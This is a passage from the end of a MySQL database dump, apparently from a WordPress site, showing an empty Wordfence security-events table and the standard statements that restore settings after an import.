  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_wfsecurityevents`
--

LOCK TABLES `wpcl_wfsecurityevents` WRITE;
/*!40000 ALTER TABLE `wpcl_wfsecurityevents` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpcl_wfsecurityevents` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_wfsecurityevents` with 0 row(s)
--

/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;
/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on: Tue, 21 Nov 2023 16:49:44 +0000
